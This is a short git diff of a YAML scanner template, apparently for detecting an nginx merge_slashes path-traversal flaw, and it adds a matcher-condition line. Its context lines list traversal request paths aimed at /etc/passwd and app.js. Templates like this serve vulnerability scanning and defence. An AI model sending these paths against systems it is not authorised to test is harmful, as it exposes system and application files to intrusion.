diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 56b611097c..8b9b46a81b 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -13,6 +13,7 @@ requests: - "{{BaseURL}}//////../../../etc/passwd" - "{{BaseURL}}/static//////../../../../etc/passwd" - "{{BaseURL}}///../app.js" + matchers-condition: and matchers: - type: word